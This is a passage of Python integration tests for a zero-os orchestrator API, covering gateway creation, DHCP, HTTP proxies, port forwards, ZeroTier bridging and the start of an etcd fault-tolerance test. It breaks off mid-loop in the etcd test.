[{"plain_text_passwd": "<PASSWORD>", "lock-passwd": false,"name": "gig", "shell": "/bin/bash", "sudo": "ALL=(ALL) ALL"}]}
self.response, self.data = self.gateways_api.post_nodes_gateway(self.nodeid, nics=nics)
self.assertEqual(self.response.status_code, 201)
# Keep the gateway `nics` list intact; reassigning it here would break the nics[1]/nics[2] lookups below.
vm1_nics = [{'id': nics[1]['id'], 'type': nics[1]['type'], 'macaddress': vm1_mac_addr}]
self.create_vm(nics=vm1_nics)
vm2_nics = [{'id': nics[2]['id'], 'type': nics[2]['type'], 'macaddress': vm2_mac_addr}]
self.create_vm(nics=vm2_nics)
self.lg.info(' [*] create test container')
test_nics = [{'type': nics[1]['type'], 'id': nics[1]['id'], 'config': {'dhcp': True}, 'hwaddr': test_container_mac_addr},
{'type': nics[2]['type'], 'id': nics[2]['id'], 'config': {'dhcp': True}, 'hwaddr': test_container_mac_addr}]
uid = self.core0_client.client.container.create(self.flist, nics=test_nics).get()
test_container = self.core0_client.client.container.client(uid)
time.sleep(60)
response = test_container.bash(
'sshpass -p rooter ssh gig@%s -oStrictHostKeyChecking=no ping %s' % (vm1_ip_addr, vm2_ip_addr)).get()
self.assertEqual(response.state, 'SUCCESS', response.stderr)
response = test_container.bash(
'sshpass -p rooter ssh gig@%s -oStrictHostKeyChecking=no ping %s' % (vm2_ip_addr, vm1_ip_addr)).get()
self.assertEqual(response.state, 'SUCCESS', response.stderr)
def test005_create_gateway_with_bridge_xlan_container(self):
""" GAT-127
**Test Scenario:**
#. Get random node (N0), should succeed.
#. Create gateway with bridge and vxlan as nics on node (N0), should succeed.
#. Bind a new container to vlan(1).
#. Verify that this container has public access.
"""
bridge_name = 'b' + self.random_string()
nics_type = [{
'type': 'bridge',
'gateway': True,
'dhcp': False,
'bridge_name': bridge_name,
'zerotierbridge': ''
},
{
'type': random.choice(['vlan', 'vxlan']),
'gateway': False,
'dhcp': True,
'bridge_name': '',
'zerotierbridge': ''
}
]
nics = self.get_gateway_nic(nics_types=nics_type)
self.lg.info(' [*] Create bridge (B1) on node (N0), should succeed with 201')
setting = {"cidr": nics[0]['config']['gateway'] + '/24'}
response, self.bridge_data = self.bridges_api.post_nodes_bridges(self.nodeid, name=bridge_name, networkMode='static', nat=True, setting=setting)
self.assertEqual(response.status_code, 201, response.content)
self.response, self.data = self.gateways_api.post_nodes_gateway(self.nodeid, nics=nics)
self.assertEqual(self.response.status_code, 201)
self.lg.info(' [*] Create container')
nics_container = [{"type": nics[1]['type'],
"id": nics[1]['id'],
"hwaddr": nics[1]['dhcpserver']['hosts'][0]['macaddress'],
"config": {"dhcp": True}}]
response, self.container_data = self.containers_api.post_containers(self.nodeid, nics=nics_container)
self.assertEqual(response.status_code, 201, " [*] Can't create container.")
container = self.core0_client.get_container_client(self.container_data['name'])
self.assertTrue(container)
time.sleep(5)
response = container.bash('ping -w3 8.8.8.8').get()
self.assertEqual(response.state, 'SUCCESS')
self.assertNotIn("unreachable", response.stdout)
@unittest.skip('ssh to vm issue')
def test007_create_gateway_with_bridge_xlan_vm(self):
""" GAT-129
**Test Scenario:**
#. Get random node (N0), should succeed.
#. Create gateway with bridge and vlan as nics on node (N0), should succeed.
#. Bind a new vm to vlan(1).
#. Verify that this vm has public access.
"""
self.lg.info(' [*] Create bridge (B1) on node (N0), should succeed with 201')
response, self.bridge_data = self.bridges_api.post_nodes_bridges(self.nodeid, networkMode='static', nat=True)
self.assertEqual(response.status_code, 201, response.content)
time.sleep(3)
nics_type = [{
'type': 'bridge',
'gateway': True,
'dhcp': False,
'bridge_name': self.bridge_data['name'],
'zerotierbridge': ''
},
{
'type': random.choice(['vlan', 'vxlan']),
'gateway': False,
'dhcp': True,
'bridge_name': '',
'zerotierbridge': ''
}
]
nics = self.get_gateway_nic(nics_types=nics_type)
self.response, self.data = self.gateways_api.post_nodes_gateway(self.nodeid, nics=nics)
self.assertEqual(self.response.status_code, 201)
# The dhcpserver data lives on the generated nics, not on the nics_type spec list.
vm1_mac_addr = nics[1]['dhcpserver']['hosts'][0]['macaddress']
vm1_ip_addr = nics[1]['dhcpserver']['hosts'][0]['ipaddress']
test_container_mac_addr = nics[1]['dhcpserver']['hosts'][1]['macaddress']
vm1_nics = [{'id': nics[1]['id'], 'type': nics[1]['type'], 'macaddress': vm1_mac_addr}]
self.create_vm(nics=vm1_nics)
self.lg.info(' [*] create test container')
test_nics = [{'type': nics[1]['type'], 'id': nics[1]['id'], 'config': {'dhcp': True}, 'hwaddr': test_container_mac_addr}]
uid = self.core0_client.client.container.create(self.flist, nics=test_nics).get()
test_container = self.core0_client.client.container.client(uid)
test_container.bash('apt install ssh -y; apt install sshpass -y')
time.sleep(60)
response = test_container.bash('ssh gig@%s -oStrictHostKeyChecking=no ping -w3 8.8.8.8' % vm1_ip_addr).get()
self.assertEqual(response.state, 'SUCCESS')
self.core0_client.client.container.terminate(int(uid))
def test009_create_gateway_dhcpserver(self):
""" GAT-131
**Test Scenario:**
#. Get random node (N0), should succeed.
#. Create gateway with bridge and xlan as nics on node (N0), should succeed.
#. Specify a dhcpserver for container and vm in this GW
#. Create a container and vm to match the dhcpserver specs
#. Verify that container and vm ips are matching with the dhcpserver specs.
"""
self.lg.info(' [*] Create bridge (B1) on node (N0), should succeed with 201')
response, self.bridge_data = self.bridges_api.post_nodes_bridges(self.nodeid, networkMode='static', nat=True)
self.assertEqual(response.status_code, 201, response.content)
time.sleep(3)
nics_type = [{
'type': 'bridge',
'gateway': True,
'dhcp': False,
'bridge_name': self.bridge_data['name'],
'zerotierbridge': ''
},
{
'type': random.choice(['vlan', 'vxlan']),
'gateway': False,
'dhcp': True,
'bridge_name': '',
'zerotierbridge': ''
}
]
nics = self.get_gateway_nic(nics_types=nics_type)
self.response, self.data = self.gateways_api.post_nodes_gateway(node_id=self.nodeid, nics=nics)
self.assertEqual(self.response.status_code, 201, self.response.content)
nics_container = [{
'type': nics[1]['type'],
'name': 'test',
'id': nics[1]['id'],
'hwaddr': nics[1]['dhcpserver']['hosts'][0]['macaddress'],
'config': {'dhcp': True}
}]
uid = self.core0_client.client.container.create(self.flist, nics=nics_container).get()
time.sleep(5)
container_1 = self.core0_client.client.container.client(int(uid))
container_1_nics = container_1.info.nic()
interface = [x for x in container_1_nics if x['name'] == 'test']
self.assertNotEqual(interface, [])
self.assertIn(nics[1]['dhcpserver']['hosts'][0]['ipaddress'], [x['addr'][:-3] for x in interface[0]['addrs']])
self.assertEqual(nics[1]['dhcpserver']['hosts'][0]['macaddress'], interface[0]['hardwareaddr'])
self.core0_client.client.container.terminate(int(uid))
@unittest.skip('https://github.com/zero-os/0-orchestrator/issues/1102')
def test010_create_gateway_httpproxy(self):
""" GAT-132
**Test Scenario:**
#. Get random node (N0), should succeed.
#. Create gateway with bridge and vlan as nics and httpproxy with two containers on node (N0), should succeed.
#. Create two containers to test the httpproxy's configuration
#. Verify that the httpproxy's configuration is working right
"""
self.lg.info(' [*] Create bridge (B1) on node (N0), should succeed with 201')
response, self.bridge_data = self.bridges_api.post_nodes_bridges(self.nodeid, networkMode='static', nat=True)
self.assertEqual(response.status_code, 201, response.content)
time.sleep(3)
nics_type = [{
'type': 'bridge',
'gateway': True,
'dhcp': False,
'bridge_name': self.bridge_data['name'],
'zerotierbridge': ''
},
{
'type': random.choice(['vlan', 'vxlan']),
'gateway': False,
'dhcp': True,
'bridge_name': '',
'zerotierbridge': ''
}
]
nics_data = self.get_gateway_nic(nics_types=nics_type)
httpproxies = [
{
"host": "container1",
"destinations": ['http://{}:1000'.format(nics_data[1]['config']['cidr'][:-4] + '10/24')],
"types": ['http', 'https']
},
{
"host": "container2",
"destinations": ['http://{}:2000'.format(nics_data[1]['config']['cidr'][:-4] + '20/24')],
"types": ['http', 'https']
}
]
self.response, self.data = self.gateways_api.post_nodes_gateway(node_id=self.nodeid, nics=nics_data, httpproxies=httpproxies)
self.assertEqual(self.response.status_code, 201, self.response.content)
nics = [{'type': nics_type[1]['type'],
'id': nics_data[1]['id'],
'config': {'dhcp': False,
'gateway': nics_data[1]['config']['cidr'][:-3],
'cidr': nics_data[1]['config']['cidr'][:-4] + '10/24'}}]
uid_1 = self.core0_client.client.container.create(self.flist, nics=nics).get()
container_1 = self.core0_client.client.container.client(int(uid_1))
nics = [{'type': nics_type[1]['type'],
'id': nics_data[1]['id'],
'config': {'dhcp': False,
'gateway': nics_data[1]['config']['cidr'][:-3],
'cidr': nics_data[1]['config']['cidr'][:-4] + '20/24'}}]
uid = self.core0_client.client.container.create(self.flist, nics=nics).get()
container_2 = self.core0_client.client.container.client(int(uid))
self.lg.info('Make sure that those two containers can ping each others')
container_1.bash('python3 -m http.server 1000')
container_2.bash('python3 -m http.server 2000')
time.sleep(2)
response = container_1.bash(
'python3 -c "from urllib.request import urlopen; urlopen(\'{}\')"'.format('http://container2')).get()
self.assertEqual(response.state, 'SUCCESS')
response = container_2.bash(
'python3 -c "from urllib.request import urlopen; urlopen(\'{}\')"'.format('http://container1')).get()
self.assertEqual(response.state, 'SUCCESS')
self.core0_client.client.container.terminate(int(uid_1))
self.core0_client.client.container.terminate(int(uid))
def test011_create_gateway_portforwards(self):
""" GAT-133
**Test Scenario:**
#. Get random node (N0), should succeed.
#. Create bridge(B0) , should succeed.
#. Create gateway with bridge and vlan as nics should succeed.
#. Set a portforward form srcip:80 to destination:80
#. Create one container as a destination host
#. Start any service in this container
#. Using core0_client try to request this service and make sure that u can reach the container
"""
bridge_name = 'b' + self.random_string()
self.lg.info(" [*] Create gateway with bridge and vlan as nics should succeed.")
nics_type = [{
'type': 'bridge',
'gateway': True,
'dhcp': False,
'bridge_name': bridge_name,
'zerotierbridge': ''
},
{
'type': random.choice(['vlan', 'vxlan']),
'gateway': False,
'dhcp': True,
'bridge_name': '',
'zerotierbridge': ''
}
]
nics = self.get_gateway_nic(nics_types=nics_type)
self.lg.info(' [*] Create bridge (B1) on node (N0), should succeed with 201')
setting = {"cidr": nics[0]['config']['gateway'] + '/24'}
response, self.bridge_data = self.bridges_api.post_nodes_bridges(self.nodeid, name=bridge_name, networkMode='static', nat=True, setting=setting)
self.assertEqual(response.status_code, 201, response.content)
portforwards = [
{
"srcport": 5000,
"srcip": nics[0]['config']['cidr'][:-3],
"dstport": 5000,
"dstip": nics[1]['dhcpserver']['hosts'][0]['ipaddress'],
"protocols": [
"tcp"
]
}
]
self.lg.info("[*] Create rule on port 80")
try:
self.core0_client.client.nft.open_port(5000)
except:
pass
self.response, self.data = self.gateways_api.post_nodes_gateway(node_id=self.nodeid, nics=nics, portforwards=portforwards)
self.assertEqual(self.response.status_code, 201, self.response.content)
self.lg.info(' [*] Create container')
nics_container = [{"type": nics[1]['type'],
"id": nics[1]['id'],
"hwaddr": nics[1]['dhcpserver']['hosts'][0]['macaddress'],
"config": {"dhcp": True}}]
response, self.container_data = self.containers_api.post_containers(self.nodeid, nics=nics_container)
self.assertEqual(response.status_code, 201, " [*] Can't create container.")
container = self.core0_client.get_container_client(self.container_data['name'])
self.assertTrue(container)
file_name = self.random_string()
self.lg.info(" [*] Start any service in this container")
response = container.bash("echo test > {}.txt".format(file_name)).get()
self.assertEqual(response.state, "SUCCESS", response.stderr)
container.bash("python3 -m http.server 5000")
time.sleep(5)
url = 'http://{}:5000/{}.txt'.format(nics[0]['config']['cidr'][:-3], file_name)
response = self.core0_client.client.bash('wget %s' % url).get()
self.assertEqual(response.state, "SUCCESS", response.stderr)
response = self.core0_client.client.bash('ls | grep {}.txt'.format(file_name)).get()
self.assertEqual(response.state, "SUCCESS", response.stderr)
def test012_create_two_gateways_zerotierbridge(self):
""" GAT-134
**Test Scenario:**
#. Get random node (N0), should succeed.
#. Create bridge(B0) with true nat, should succeed.
#. Create zerotier network.
#. Create two Gws (Gw1)(Gw2) and link them with zerotier bridge.
#. Create (C1),(C2) containers for each Gw .
#. Verify that the containers created behind each GW can reach each other.
"""
self.lg.info(" [*] Create zerotier network.")
nwid = self.create_zerotier_network(default_config=False)
bridge_name = self.random_string()
self.lg.info(" [*] Create two Gws and link them with zerotier bridge.")
nics_type = [
{
'type': 'bridge',
'gateway': True,
'dhcp': False,
'bridge_name': bridge_name,
'zerotierbridge': False
},
{
'type': random.choice(['vlan', 'vxlan']),
'gateway': False,
'dhcp': True,
'bridge_name': '',
'zerotierbridge': nwid
}
]
nics = self.get_gateway_nic(nics_types=nics_type)
c1_ip = nics[1]["dhcpserver"]["hosts"][0]["ipaddress"]
self.lg.info(' [*] Create bridge (B0) on node (N0), should succeed with 201')
setting = {"cidr": nics[0]['config']['gateway'] + '/24'}
response, self.bridge_data = self.bridges_api.post_nodes_bridges(self.nodeid, name=bridge_name, networkMode='static', nat=True, setting=setting)
self.assertEqual(response.status_code, 201, response.content)
self.response, self.data = self.gateways_api.post_nodes_gateway(node_id=self.nodeid, nics=nics)
self.assertEqual(self.response.status_code, 201, self.response.content)
self.lg.info(" [*] create (c1) containers for each Gw. ")
c1_nics = [{'type': nics[1]['type'],
'id': nics[1]['id'],
"hwaddr": nics[1]["dhcpserver"]["hosts"][0]["macaddress"],
'config': {"dhcp": True}}]
response, self.container_data = self.containers_api.post_containers(nodeid=self.nodeid, nics=c1_nics)
self.assertEqual(response.status_code, 201)
c1_client = self.core0_client.get_container_client(self.container_data['name'])
self.assertTrue(c1_client)
bridge_name_2 = self.random_string()
nics_type = [
{
'type': 'bridge',
'gateway': True,
'dhcp': False,
'bridge_name': bridge_name_2,
'zerotierbridge': False
},
{
'type': random.choice(['vlan', 'vxlan']),
'gateway': False,
'dhcp': True,
'bridge_name': '',
'zerotierbridge': nwid
}
]
nics_2 = self.get_gateway_nic(nics_types=nics_type)
nics_2[1]['config'] = nics[1]['config']
nics_2[1]['dhcpserver'] = nics[1]['dhcpserver']
c2_ip = nics_2[1]["dhcpserver"]["hosts"][1]["ipaddress"]
self.lg.info(' [*] Create bridge (B0) on node (N0), should succeed with 201')
setting = {"cidr": nics_2[0]['config']['gateway'] + '/24'}
response, self.bridge_data = self.bridges_api.post_nodes_bridges(self.nodeid, name=bridge_name_2, networkMode='static', nat=True, setting=setting)
self.assertEqual(response.status_code, 201, response.content)
self.response, self.data = self.gateways_api.post_nodes_gateway(node_id=self.nodeid, nics=nics_2)
self.assertEqual(self.response.status_code, 201, self.response.content)
self.lg.info(" [*] create (c2) containers for each Gw. ")
c2_nics = [{'type': nics[1]['type'],
'id': nics[1]['id'],
"hwaddr": nics[1]["dhcpserver"]["hosts"][1]["macaddress"],
'config': {"dhcp": True}}]
response, self.container_data = self.containers_api.post_containers(nodeid=self.nodeid, nics=c2_nics)
self.assertEqual(response.status_code, 201)
c2_client = self.core0_client.get_container_client(self.container_data['name'])
self.assertTrue(c2_client)
response = c1_client.bash('ping -c 5 %s' % c2_ip).get()
self.assertEqual(response.state, 'SUCCESS')
self.assertNotIn("unreachable", response.stdout)
response = c2_client.bash('ping -c 5 %s' % c1_ip).get()
self.assertEqual(response.state, 'SUCCESS')
self.assertNotIn("unreachable", response.stdout)
class TestGatewayAPIUpdate(TestcasesBase):
def setUp(self):
super().setUp()
nics_type = [
{
'type': random.choice(['vlan', 'vxlan']),
'gateway': True,
'dhcp': False,
'bridge_name': '',
'zerotierbridge': False
},
{
'type': random.choice(['vlan', 'vxlan']),
'gateway': False,
'dhcp': True,
'bridge_name': '',
'zerotierbridge': False
}
]
self.nics = self.get_gateway_nic(nics_types=nics_type)
self.core0_client.create_ovs_container()
self.response, self.data = self.gateways_api.post_nodes_gateway(self.nodeid, nics=self.nics)
self.assertEqual(self.response.status_code, 201)
self.gw_name = self.data['name']
self.gw_domain = self.data['domain']
def tearDown(self):
self.lg.info(' [*] Delete all node {} gateways'.format(self.nodeid))
if 'data' in self.__dict__.keys():
self.gateways_api.delete_nodes_gateway(self.nodeid, self.gw_name)
super().tearDown()
def test001_list_gateways(self):
""" GAT-098
**Test Scenario:**
#. Get random node (N0), should succeed.
#. Create gateway (GW0) on node (N0), should succeed.
#. List all node (N0) gateways, (GW0) should be listed.
"""
self.lg.info(' [*] List node (N0) gateways, (GW0) should be listed')
response = self.gateways_api.list_nodes_gateways(self.nodeid)
self.assertEqual(response.status_code, 200)
self.assertIn(self.gw_name, [x['name'] for x in response.json()])
def test002_get_gateway_info(self):
""" GAT-099
**Test Scenario:**
#. Get random node (N0), should succeed.
#. Create gateway (GW0) on node (N0), should succeed.
#. Get gateway (GW0) info, should succeed.
"""
response = self.gateways_api.get_nodes_gateway(self.nodeid, self.gw_name)
self.assertEqual(response.status_code, 200)
def test003_delete_gateway(self):
""" GAT-100
**Test Scenario:**
#. Get random node (N0), should succeed.
#. Create gateway (GW0) on node (N0), should succeed.
#. Delete gateway (GW0), should succeed.
#. List node (N0) gateways, (GW0) should not be listed.
"""
self.lg.info(' [*] Delete gateway (GW0), should succeed')
response = self.gateways_api.delete_nodes_gateway(self.nodeid, self.gw_name)
self.assertEqual(response.status_code, 204)
self.lg.info(' [*] List node (N0) gateways, (GW0) should not be listed')
response = self.gateways_api.list_nodes_gateways(self.nodeid)
self.assertEqual(response.status_code, 200)
self.assertNotIn(self.gw_name, [x['name'] for x in response.json()])
def test004_stop_gw(self):
""" GAT-135
**Test Scenario:**
#. Stop the running gateway
#. Verify its status
"""
response = self.containers_api.get_containers(nodeid=self.nodeid)
for container in response.json():
if self.gw_name == container['name']:
self.assertEqual(container['status'], 'running')
response = self.gateways_api.post_nodes_gateway_stop(nodeid=self.nodeid, gwname=self.gw_name)
self.assertEqual(response.status_code, 204, response.content)
response = self.containers_api.get_containers(nodeid=self.nodeid)
for container in response.json():
if self.gw_name == container['name']:
self.assertEqual(container['status'], 'halted')
response = self.gateways_api.post_nodes_gateway_start(nodeid=self.nodeid, gwname=self.gw_name)
self.assertEqual(response.status_code, 204, response.content)
def test005_start_gw(self):
""" GAT-136
**Test Scenario:**
#. Stop the running gateway and make sure that its status has been changed
#. Start the gateway
#. Verify its status
"""
response = self.gateways_api.post_nodes_gateway_stop(nodeid=self.nodeid, gwname=self.gw_name)
self.assertEqual(response.status_code, 204, response.content)
response = self.containers_api.get_containers(nodeid=self.nodeid)
for container in response.json():
if self.gw_name == container['name']:
self.assertEqual(container['status'], 'halted')
response = self.gateways_api.post_nodes_gateway_start(nodeid=self.nodeid, gwname=self.gw_name)
self.assertEqual(response.status_code, 204, response.content)
response = self.containers_api.get_containers(nodeid=self.nodeid)
for container in response.json():
if self.gw_name == container['name']:
self.assertEqual(container['status'], 'running')
def test006_update_gw_nics_config(self):
""" GAT-137
**Test Scenario:**
#. Use put method to update the nics config for the gw
#. List the gw and make sure that its nics config have been updated
"""
nics = list(self.nics)
nics[0]['config']['cidr'] = "192.168.10.10/24"
nics[0]['config']['gateway'] = "192.168.10.1"
nics[1]['config']['cidr'] = "192.168.20.2/24"
del nics[1]['dhcpserver']
data = dict(self.data)
data['nics'] = nics
self.lg.info(' [*] Use put method to update the nics config for the gw')
response = self.gateways_api.update_nodes_gateway(self.nodeid, self.gw_name, data)
self.assertEqual(response.status_code, 204)
self.lg.info(' [*] List the gw and make sure that its nics config have been updated')
response = self.gateways_api.get_nodes_gateway(self.nodeid, self.gw_name)
self.assertEqual(response.status_code, 200)
self.assertEqual(nics, response.json()['nics'])
def test007_update_gw_portforwards_config(self):
""" GAT-138
**Test Scenario:**
#. Use put method to update the portforwards config for the gw
#. List the gw and make sure that its portforwards config have been updated
"""
self.data['portforwards'] = [
{
"protocols": ['udp', 'tcp'],
"srcport": random.randint(100, 1000),
"srcip": "192.168.1.1",
"dstport": random.randint(100, 1000),
"dstip": "192.168.2.100"
}
]
del self.data['name']
self.lg.info(' [*] Use put method to update the portforwards config for the gw')
response = self.gateways_api.update_nodes_gateway(self.nodeid, self.gw_name, self.data)
self.assertEqual(response.status_code, 204)
self.lg.info(' [*] List the gw and make sure that its portforwards config have been updated')
response = self.gateways_api.get_nodes_gateway(self.nodeid, self.gw_name)
self.assertEqual(response.status_code, 200)
self.assertEqual(self.data['portforwards'], response.json()['portforwards'])
def test008_update_gw_dhcpserver_config(self):
""" GAT-139
**Test Scenario:**
#. Use put method to update the dhcpserver config for the gw
#. List the gw and make sure that its dhcpserver config have been updated
"""
self.data['nics'][1]['dhcpserver'] = {
"nameservers": ["8.8.8.8"],
"hosts": [
{
"macaddress": self.randomMAC(),
"hostname": self.random_string(),
"ipaddress": self.data['nics'][1]['config']['cidr'][:-4] + '10'
}
]
}
del self.data['name']
self.lg.info(' [*] Use put method to update the dhcpserver config for the gw')
response = self.gateways_api.update_nodes_gateway(self.nodeid, self.gw_name, self.data)
self.assertEqual(response.status_code, 204, response.content)
self.lg.info(' [*] List the gw and make sure that its dhcpserver config have been updated')
response = self.gateways_api.get_nodes_gateway(self.nodeid, self.gw_name)
self.assertEqual(response.status_code, 200)
self.assertEqual(self.data['nics'][1]['dhcpserver'], response.json()['nics'][1]['dhcpserver'])
def test009_update_gw_httpproxies_config(self):
""" GAT-140
**Test Scenario:**
#. Use put method to update the httpproxies config for the gw
#. List the gw and make sure that its httpproxies config have been updated
"""
self.data['httpproxies'] = [
{
"host": self.random_string(),
"destinations": ["192.168.200.10:1101"],
"types": ['https', 'http']
}
]
del self.data['name']
self.lg.info(' [*] Use put method to update the httpproxies config for the gw')
response = self.gateways_api.update_nodes_gateway(self.nodeid, self.gw_name, self.data)
self.assertEqual(response.status_code, 204)
self.lg.info(' [*] List the gw and make sure that its httpproxies config has been updated')
response = self.gateways_api.get_nodes_gateway(self.nodeid, self.gw_name)
self.assertEqual(response.status_code, 200)
self.assertEqual(self.data['httpproxies'], response.json()['httpproxies'])
def test010_create_list_portforward(self):
""" GAT-114
**Test Scenario:**
#. Create new portforward table using firewall/forwards api
#. Verify it is working right
"""
body = {
"protocols": ['udp', 'tcp'],
"srcport": random.randint(1, 2000),
"srcip": "192.168.1.1",
"dstport": random.randint(1, 2000),
"dstip": "192.168.2.5"
}
self.lg.info(' [*] Create new portforward table using firewall/forwards api')
response = self.gateways_api.post_nodes_gateway_forwards(self.nodeid, self.gw_name, body)
self.assertEqual(response.status_code, 201, response.content)
self.lg.info(' [*] Verify it is working right')
response = self.gateways_api.list_nodes_gateway_forwards(self.nodeid, self.gw_name)
self.assertEqual(response.status_code, 200)
self.assertIn(body, response.json())
def test012_delete_portforward(self):
""" GAT-115
**Test Scenario:**
#. Create new portforward table using firewall/forwards api
#. List portfowards table
#. Delete this portforward config
#. List portforwards and verify that it has been deleted
"""
body = {
"protocols": ['udp', 'tcp'],
"srcport": random.randint(1, 2000),
"srcip": "192.168.1.1",
"dstport": random.randint(1, 2000),
"dstip": "192.168.2.5"
}
self.lg.info(' [*] Create new portforward table using firewall/forwards api')
response = self.gateways_api.post_nodes_gateway_forwards(self.nodeid, self.gw_name, body)
self.assertEqual(response.status_code, 201, response.content)
self.lg.info(' [*] List portfowards table')
response = self.gateways_api.list_nodes_gateway_forwards(self.nodeid, self.gw_name)
self.assertEqual(response.status_code, 200)
self.assertIn(body, response.json())
self.lg.info(' [*] Delete this portforward config')
forwardid = '{}:{}'.format(body['srcip'], body['srcport'])
response = self.gateways_api.delete_nodes_gateway_forward(self.nodeid, self.gw_name, forwardid)
self.assertEqual(response.status_code, 204)
self.lg.info(' [*] List portfowards table')
response = self.gateways_api.list_nodes_gateway_forwards(self.nodeid, self.gw_name)
self.assertEqual(response.status_code, 200)
self.assertNotIn(body, response.json())
def test013_add_dhcp_host(self):
""" GAT-116
**Test Scenario:**
#. Add new dhcp host to an interface
#. List dhcp hosts
#. Verify that the list has the config
"""
self.lg.info(' [*] Add new dhcp host to an interface')
interface = [x for x in self.nics if x.get('dhcpserver')][0]['name']
hostname = self.random_string()
macaddress = self.randomMAC()
ipaddress = '192.168.2.3'
body = {
"hostname": hostname,
"macaddress": macaddress,
"ipaddress": ipaddress
}
response = self.gateways_api.post_nodes_gateway_dhcp_host(self.nodeid, self.gw_name, interface, body)
self.assertEqual(response.status_code, 204)
self.lg.info(' [*] List dhcp hosts')
response = self.gateways_api.list_nodes_gateway_dhcp_hosts(self.nodeid, self.gw_name, interface)
self.assertEqual(response.status_code, 200)
self.lg.info(' [*] Verify that is the list has the config')
dhcp_host = [x for x in response.json() if x['hostname'] == hostname]
self.assertNotEqual(dhcp_host, [])
for key in body.keys():
self.assertEqual(body[key], dhcp_host[0][key])
def test014_delete_dhcp_host(self):
""" GAT-117
**Test Scenario:**
#. Add new dhcp host to an interface
#. List dhcp hosts
#. Delete one host form the dhcp
#. List dhcp hosts
#. Verify that the dhcp has been updated
"""
self.lg.info(' [*] Add new dhcp host to an interface')
interface = [x for x in self.nics if x.get('dhcpserver')][0]['name']
hostname = self.random_string()
macaddress = self.randomMAC()
ipaddress = '192.168.2.3'
body = {
"hostname": hostname,
"macaddress": macaddress,
"ipaddress": ipaddress
}
response = self.gateways_api.post_nodes_gateway_dhcp_host(self.nodeid, self.gw_name, interface, body)
self.assertEqual(response.status_code, 204)
self.lg.info(' [*] Delete one host form the dhcp')
response = self.gateways_api.delete_nodes_gateway_dhcp_host(self.nodeid, self.gw_name, interface, macaddress)
self.assertEqual(response.status_code, 204)
self.lg.info(' [*] List dhcp hosts')
response = self.gateways_api.list_nodes_gateway_dhcp_hosts(self.nodeid, self.gw_name, interface)
self.assertEqual(response.status_code, 200)
self.lg.info(' [*] Verify that the dhcp has been updated')
dhcp_host = [x for x in response.json() if x['hostname'] == hostname]
self.assertEqual(dhcp_host, [])
def test015_create_new_httpproxy(self):
""" GAT-118
**Test Scenario:**
#. Create new httpproxy
#. List httpproxy config
#. Verify that the list has the config
"""
self.lg.info(' [*] Add new httpproxy host to an interface')
body = {
"host": self.random_string(),
"destinations": ['http://192.168.2.200:5000'],
"types": ['http', 'https']
}
response = self.gateways_api.post_nodes_gateway_httpproxy(self.nodeid, self.gw_name, body)
self.assertEqual(response.status_code, 201)
self.lg.info(' [*] List dhcp httpproxy')
response = self.gateways_api.list_nodes_gateway_httpproxies(self.nodeid, self.gw_name)
self.assertEqual(response.status_code, 200)
self.lg.info(' [*] Verify that is the list has the config')
httpproxy_host = [x for x in response.json() if x['host'] == body['host']]
self.assertNotEqual(httpproxy_host, [])
for key in body.keys():
self.assertEqual(body[key], httpproxy_host[0][key])
def test016_delete_httpproxyid(self):
""" GAT-119
**Test Scenario:**
#. Create new httpproxy
#. Delete httpproxy id
#. List dhcp hosts
#. Verify that the dhcp has been updated
"""
self.lg.info(' [*] Create new httpproxy')
body = {
"host": self.random_string(),
"destinations": ['http://192.168.2.200:500'],
"types": ['http', 'https']
}
response = self.gateways_api.post_nodes_gateway_httpproxy(self.nodeid, self.gw_name, body)
self.assertEqual(response.status_code, 201)
self.lg.info(' [*] Delete httpproxy id')
proxyid = body['host']
response = self.gateways_api.delete_nodes_gateway_httpproxy(self.nodeid, self.gw_name, proxyid)
self.assertEqual(response.status_code, 204)
self.lg.info(' [*] List httpproxies')
response = self.gateways_api.list_nodes_gateway_httpproxies(self.nodeid, self.gw_name)
self.assertEqual(response.status_code, 200)
self.lg.info(' [*] Verify that the httpproxies has been updated')
httpproxy_host = [x for x in response.json() if x['host'] == body['host']]
self.assertEqual(httpproxy_host, [])
```
#### File: testcases/advanced_tests/test04_etcd.py
```python
import random, time
from testcases.testcases_base import TestcasesBase
import unittest
class Test_etcd(TestcasesBase):
def setUp(self):
super().setUp()
number_of_free_disks, disk_type = self.get_max_available_free_disks([self.nodeid])
storageclusters = self.storageclusters_api.get_storageclusters()
if storageclusters.json() == []:
if number_of_free_disks == []:
self.skipTest(' [*] No free disks to create storagecluster')
self.lg.info(' [*] Deploy new storage cluster (SC0)')
response, data = self.storageclusters_api.post_storageclusters(
nodes=[self.nodeid],
driveType=disk_type,
servers=random.randint(1, number_of_free_disks)
)
self.assertEqual(response.status_code, 201)
self.storagecluster = data['label']
else:
self.storagecluster = storageclusters.json()[0]
self.lg.info(' [*] Create vdiskstorage (VDS0)')
response, self.vdiskstoragedata = self.vdisks_api.post_vdiskstorage(storagecluster=self.storagecluster)
self.assertEqual(response.status_code, 201)
self.lg.info(' [*] Import Image (IMG0) for (VDS0)')
response, self.imagedata = self.vdisks_api.post_import_image(vdiskstorageid=self.vdiskstoragedata["id"])
self.assertEqual(response.status_code, 201)
self.lg.info(' [*] Create vdisk (VD0)')
response, self.vdisk = self.vdisks_api.post_vdisks(vdiskstorageid=self.vdiskstoragedata["id"], imageid=self.imagedata["imageName"])
self.assertEqual(response.status_code, 201)
self.disks = [{"vdiskid": self.vdisk['id'], "maxIOps": 2000}]
self.lg.info('[*]Get number of nodes (n)')
self.number_of_nodes = len(self.nodes_info)
self.lg.info('[*] Check that etcd process is running in n of nodes if n odd,and (n-1) of nodes if n even')
self.nodes_with_etcd=[]
for node in self.nodes_info:
node_client = self.Client(node["ip"], password=self.jwt)
response = node_client.client.bash("ps xu | grep [e]tcd").get()
if response.state == "SUCCESS":
self.nodes_with_etcd.append(node)
if len(self.nodes_info)%2 == 0:
self.lg.info("[*]number of nodes even")
self.assertEqual(len(self.nodes_with_etcd), self.number_of_nodes-1)
else:
self.lg.info("[*]number of nodes odd")
self.assertEqual(len(self.nodes_with_etcd), self.number_of_nodes)
def test001_kill_etcdcluster_less_than_tolerance(self):
""" GAT-150
**Test Scenario:**
#. Check that etcd process is running in all nodes if number of nodes odd.
#. Check that etcd process is running in (n-1) nodes if number of nodes even.
#. Kill etcd_cluster in less than or equal (n-1)/2 nodes ,should succeed.
#. Check that etcd process return back in this nodes, should succeed.
#. Create (VM0),should succeed.
#. Get (VM0) details ,(VM0) status should be running.
"""
self.lg.info(" Kill etcd_cluster in less than (n-1)/2 nodes")
tolerance = int((len(self.nodes_with_etcd)-1)/2)
for i in range(tolerance):
